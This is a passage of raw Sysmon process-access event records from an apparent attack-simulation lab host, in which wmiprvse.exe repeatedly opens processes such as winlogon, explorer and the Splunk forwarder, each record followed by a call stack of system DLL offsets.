Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028663Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028662Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028661Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028660Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028659Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028658Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028657Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028656Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028655Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028654Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028653Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028652Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028651Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028650Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028649Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028648Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028647Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028646Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028645Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.490{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028644Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 